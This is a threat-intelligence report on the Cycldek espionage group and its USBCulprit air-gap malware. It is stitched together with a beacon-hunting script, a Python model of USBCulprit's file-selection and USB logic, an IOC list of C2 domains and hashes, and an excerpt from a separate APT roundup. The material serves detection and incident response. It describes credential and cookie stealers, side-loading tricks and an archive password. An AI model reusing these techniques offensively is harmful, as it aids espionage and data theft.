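    "2018-11-20T14:02:10Z 10.1.7.9 explorer.exe http://news.trungtamwtoa.com:443/search.jsp?url=a&referer=b&kw=c&psid=d",
]

if __name__ == "__main__":
    for b in hunt(SAMPLE_LOG):
        print(f"{b.cluster:8} {b.host}:{b.port} from {b.process} "
              f"({'expected' if b.process_expected else 'unexpected'} process)")
```

Two points are worth keeping when adapting this to real telemetry: the implants speak plain HTTP on ports such as 443 and 53 (as the appendix shows), so do not filter on port, and a match from a process outside `EXPECTED_PROCESSES` is still a beacon, just one that would indicate a host binary or injection target the report did not catalogue.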
All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**_Figure 4: Difference in URL scheme used by each implant for C2 communication._**\n\nFrom this we conclude that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts in Vietnamese targets, with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and shifted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n**_Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018._**\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated with a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. 
All in all, this suggests the entities operating behind those clusters are sharing multiple resources, both code and infrastructure, and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n**_Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix._**\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded by both BlueCore and RedCore implants and used either for lateral movement in the compromised networks or for information stealing from infected nodes. There were several types of these tools: some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized by the attackers to complete specific tasks.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). Running under a signed host process can be used to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers: legitimate or open-source utilities, sometimes referred to as living-off-the-land binaries, or LOLBins, abused to conduct malicious activities. 
Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features; the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n**_Figure 7: Command line usage of the custom HDoor tool._**\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. 
For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing the stolen cookie info. Entries in the file resemble this one:\n\n    {\n      \"domain\": \".google.com\",\n      \"id\": 1,\n      \"name\": \"NID\",\n      \"path\": \"/\",\n      \"value\": \"%VALUE%\"\n    }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**_Figure 8: Command line usage of the ChromePass tool._**\n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB drive. 
This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of TTPs similar to those seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**_Figure 9: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and ensure that hidden files are not shown to the user. 
It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect the files it intends to steal, using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*.ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all paths targeted for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to contain a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 1 June 2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. 
If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB drive is connected, the malware verifies whether stolen data should be exfiltrated to it or whether it already contains data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' (with the digit 1 in place of the letter l, mimicking the legitimate $Recycle.Bin folder) is searched for on the drive and created if not found. This directory is used as the target path for copying files to the drive or as the source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory on the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files are copied into the same directory, from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**_Figure 10: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted. Only if this file exists is the malware's binary copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files on the USB drive and executing them. 
Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on how they are handled, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory, whose files are then enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB drive and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**_Figure 11: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. 
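The three phases described above, as an added example that is not code from the report or from the malware: a Python model of USBCulprit's document selection and USB marker logic that an incident responder can point at a suspect working directory and a mounted drive to scope which files would have been collected and in which direction they would have moved. The extension patterns, marker file names, the default 'time' value, the archive password and the '$Recyc1e.Bin' directory are taken from the report; the directory layout, file names and timestamps it runs against are constructed. The removable-drive check via GetDriveTypeW is not modelled: the functions take a path.

```python
"""Model USBCulprit's document selection and USB marker logic for incident scoping.

Added example, not code from the report or from the malware. The extension
patterns, marker file names, the default 'time' value, the archive password and
the '$Recyc1e.Bin' directory come from the report; the directory layout it runs
against is constructed below. Nothing is copied or archived: the functions
report which files the malware would have queued and which way data would flow.
"""
import fnmatch
import os
import tempfile
from datetime import datetime

# Patterns exactly as the report prints them (including '*docx' without a dot).
DOC_PATTERNS = "*.pdf;*.doc;*.wps;*docx;*.ppt;*.xls;*.xlsx;*.pptx;*.rtf".split(";")
DEFAULT_TIME = "20160601000000"            # YYYYMMDDHHMMSS: 1 June 2016 00:00:00
DROP_DIR = "$Recyc1e.Bin"                  # digit 1, not the l of $Recycle.Bin
PULL_MARKER, SPREAD_MARKER = "1.txt", "2.txt"
MODULE_NAMES = ("{D14030E9-C60C-481E-B7C2-0D76810C6E96}",   # archive run via CUSB::runlist
                "{D14030E9-C60C-481E-B7C2-0D76810C6E95}")   # binary spawned from %TEMP%
RAR_PASSWORD = "abcd!@#$"                  # archive password seen in most variants


def read_time_marker(workdir: str) -> datetime:
    """Return the modification-time cutoff from the 'time' file next to the
    malware, creating it with the default value when absent, as the report describes."""
    path = os.path.join(workdir, "time")
    if not os.path.exists(path):
        with open(path, "w") as fh:
            fh.write(DEFAULT_TIME)
    with open(path) as fh:
        return datetime.strptime(fh.read().strip(), "%Y%m%d%H%M%S")


def select_documents(root: str, since: datetime) -> list:
    """Files under root that match a document pattern and were modified after the
    cutoff: the set the malware would list and hand to rar.exe."""
    chosen = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not any(fnmatch.fnmatch(name.lower(), p) for p in DOC_PATTERNS):
                continue
            full = os.path.join(dirpath, name)
            if datetime.fromtimestamp(os.path.getmtime(full)) > since:
                chosen.append(full)
    return sorted(chosen)


def usb_action(workdir: str, drive: str) -> dict:
    """Mirror the decisions taken when a removable drive appears."""
    return {
        "drop_dir_present": os.path.isdir(os.path.join(drive, DROP_DIR)),
        # 1.txt present: pull archives from the drive; absent: push local archives to it
        "direction": "drive->host" if os.path.exists(os.path.join(workdir, PULL_MARKER)) else "host->drive",
        # 2.txt present: the binary itself is copied into $Recyc1e.Bin on the drive
        "copy_self_to_drive": os.path.exists(os.path.join(workdir, SPREAD_MARKER)),
        "modules_on_drive": [n for n in MODULE_NAMES if os.path.exists(os.path.join(drive, n))],
        "archive_password": RAR_PASSWORD,
    }


def build_fixture():
    """Constructed layout: malware working directory, a documents tree and a 'drive'."""
    base = tempfile.mkdtemp(prefix="usbculprit-")
    workdir, docroot, drive = (os.path.join(base, d) for d in ("work", "docs", "drive"))
    for d in (workdir, docroot, os.path.join(drive, DROP_DIR)):
        os.makedirs(d)
    for name in ("plan.docx", "report.pdf", "old.xls", "notes.txt"):
        with open(os.path.join(docroot, name), "w") as fh:
            fh.write("sample content")
    old = datetime(2015, 1, 1).timestamp()
    os.utime(os.path.join(docroot, "old.xls"), (old, old))    # predates the default cutoff
    open(os.path.join(workdir, SPREAD_MARKER), "w").close()   # operator chose to spread
    open(os.path.join(drive, MODULE_NAMES[1]), "w").close()   # an update binary was staged
    return workdir, docroot, drive


def demo() -> dict:
    workdir, docroot, drive = build_fixture()
    since = read_time_marker(workdir)
    return {
        "cutoff": since.strftime("%Y-%m-%d %H:%M:%S"),
        "selected": [os.path.basename(p) for p in select_documents(docroot, since)],
        "action": usb_action(workdir, drive),
    }


if __name__ == "__main__":
    print(demo())
```

In a real case, point `read_time_marker` and `usb_action` at the directory the sample was executed from and at the mounted drive, and `select_documents` at the user's document roots with the recovered cutoff: the result is the list of files the attackers would have targeted, and the marker state tells you whether the drive was used to bring archives in or carry them out.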
This, along with the very specific files that the malware seeks as executable extensions, which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated with the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where these entities did not work in a well-coordinated manner, for example, infecting machines with the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased; it has merely evolved and changed shape, in terms of malware and actors. 
We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F - stdole.tlb (encrypted shellcode and implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 - ChromePass \n1EA07468EBDFD3D9EEC59AC57A490701 - ChromePass \n07EE1B99660C8CD5207E128F44AA8CBC - JsonCookies \n809196A64CA4A32860D28760267A1A8B - Custom HDoor \n81660985276CF9B6D979753B6E581D34 - Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 - Custom HDoor\n\n**USBCulprit:**\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 - USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 - USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE - USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 - USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 - USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 - USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 - USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 - USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D - USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 - USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 - USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 - USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 - USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 - USBCulprit Payload\n\n**Toolset overlapping in both clusters:**\n\n| Common Name | MD5 | Blue Cluster Domain | Red Cluster Domain | Description |\n|---|---|---|---|---|\n| chromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar[.]com:8080 | http://news.trungtamwtoa[.]com:88 | ChromePass |\n| goopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn[.]com:8080 | http://mychau.dongnain[.]com:443, http://hcm.vietbaonam[.]com:443 | USBCulprit |\n|  | 2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys[.]com:8080, http://tinmoi.thoitietdulich[.]com:443, http://tinmoi.thoitietdulich[.]com:53 | http://tinmoi.vieclamthemde[.]com:53, http://tinmoi.vieclamthemde[.]com | USBCulprit |\n| qclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh[.]com | http://tinmoi.vieclamthemde[.]com, http://tintuc.daikynguyen21[.]com | BlueCore loading hijacked DLL |\n| silverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://login.dangquanwatch[.]com:53, http://info.coreders[.]com:8080 | http://web.laovoanew[.]com:443, http://cdn.laokpl[.]com:8080 | Custom HDoor |\n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster \nhttp://tinmoi.vieclamthemde[.]com - Red Cluster \nhttp://kinhte.chototem[.]com - Red Cluster \nhttp://news.trungtamwtoa[.]com - Red Cluster \nhttp://mychau.dongnain[.]com - Red Cluster \nhttp://hcm.vietbaonam[.]com - Red Cluster \nhttp://login.thanhnienthegioi[.]com - Red Cluster \nhttp://103.253.25[.]73 - Red Cluster \nhttp://luan.conglyan[.]com - Red Cluster \nhttp://toiyeuvn.dongaruou[.]com - Red Cluster \nhttp://tintuc.daikynguyen21[.]com - Red Cluster \nhttp://web.laomoodwin[.]com - Red Cluster \nhttp://login.giaoxuchuson[.]com - Red Cluster \nhttp://lat.conglyan[.]com - Red Cluster \nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster \nhttp://laovoanew[.]com - Red Cluster \nhttp://cdn.laokpl[.]com - Red Cluster \nhttp://login.dangquanwatch[.]com - Blue Cluster \nhttp://info.coreders[.]com - Blue Cluster \nhttp://thanhnien.vietnannnet[.]com - Blue Cluster \nhttp://login.diendanlichsu[.]com - Blue Cluster \nhttp://login.vietnamfar[.]com - Blue Cluster \nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster \nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster \nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster \nhttp://khinhte.chinhsech[.]com - Blue Cluster \nhttp://images.webprogobest[.]com - Blue Cluster \nhttp://web.hcmuafgh[.]com - Blue Cluster \nhttp://news.cooodkord[.]com - Blue Cluster \nhttp://24h.tinthethaoi[.]com - Blue Cluster \nhttp://quocphong.ministop14[.]com - Blue Cluster \nhttp://nhantai.xmeyeugh[.]com - Blue Cluster \nhttp://thoitiet.yrindovn[.]com - Blue Cluster \nhttp://hanghoa.trenduang[.]com - Blue Cluster\n\n_Source: Securelist, 'Cycldek: Bridging the (air) gap', published 2020-06-03, https://securelist.com/cycldek-bridging-the-air-gap/97157/. CVEs tagged on the post: CVE-2012-0158, CVE-2017-11882, CVE-2018-0802._\n\n---\n\n_The following is a separate Securelist post (last seen 2019-11-29)._\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. 
The attackers used two methods to install these implants: they backdoored legitimate apps by injecting malicious Smali code, and they built their own version of the open-source 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### NewsBeef beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka Charming Kitten, also tracked as APT35), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year: tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. 
Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 100 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices, suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high-profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. 
Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that Turla uses to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues, the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan, are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. 
Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates, whitelisted per victim, hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation Editor vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers; we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. 
Our telemetry indicates that the latest Dtrack activity was detected at the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).

## Other security news

### Sodin ransomware attacks MSP

In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June a similar vulnerability was discovered – CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

Ransomware continues to be a major headache for consumers and businesses alike.
Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).

### The impact of web mining

[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of its [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected – most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model – using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have?
We recently tried to quantify the economic and environmental impact of web miners, and thereby evaluate the positive benefit of protecting against mining.

